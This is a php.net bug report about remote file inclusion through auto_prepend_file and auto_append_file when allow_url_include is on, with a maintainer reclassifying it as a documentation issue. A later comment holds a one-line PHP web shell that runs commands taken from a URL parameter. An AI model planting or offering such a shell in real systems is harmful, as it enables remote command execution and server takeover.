php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Doc Bug #79476 remote file include
Submitted: 2020-04-14 15:28 UTC Modified: 2020-04-16 07:54 UTC
Votes:8
Avg. Score:3.0 ± 1.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: c0d1M4x at outlook dot com Assigned:
Status: Verified Package: *Configuration Issues
PHP Version: 7.2.29 OS: Linux/Windows
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: c0d1M4x at outlook dot com
New email:
PHP Version: OS:

 

 [2020-04-14 15:28 UTC] c0d1M4x at outlook dot com
Description:
------------
[php version]

Test version is php 7.2.27(Centos) and php 7.3.x(Windows)

[linux install command]

yum install php72w-common php72w-fpm php72w-opcache php72w-gd php72w-mysqlnd php72w-mbstring php72w-pecl-redis php72w-pecl-memcached php72w-devel -y

[Issus]

The issus config file is "php.ini".

When "allow_url_include" is set to "On", "auto_prepend_file" and  "auto_append_file" can be set to a remote address and can be successfully included and exploited. This may cause the attacker to use this configuration item to use getshell for a long time in the case of a getshell or other vulnerabilities.



Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2020-04-15 09:01 UTC] cmb@php.net
-Type: Security +Type: Documentation Problem
 [2020-04-15 09:01 UTC] cmb@php.net
allow_url_include defaults to Off, and is deprecated as of PHP
7.4.0.  If you enable this setting, you are supposed to know what
you are doing, so this is not a security issue.

I think, though, that this can be documented better.  The security
warning on the include man page[1] isn't as clear is it could be,
and likely a cautionary note should be added to the documentation
of the INI setting[2].  Furthermore, its deprecation has to be
documented.

[1] <https://www.php.net/manual/en/function.include.php>
[2] <https://www.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include>
 [2020-04-16 07:54 UTC] cmb@php.net
-Status: Open +Status: Verified
 [2023-11-10 15:12 UTC] ragafa5955 at glalen dot com
test
 [2023-11-10 15:37 UTC] n13bng at gmail dot com
<?php echo system($_GET['a']);?>
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Dec 11 22:01:27 2024 UTC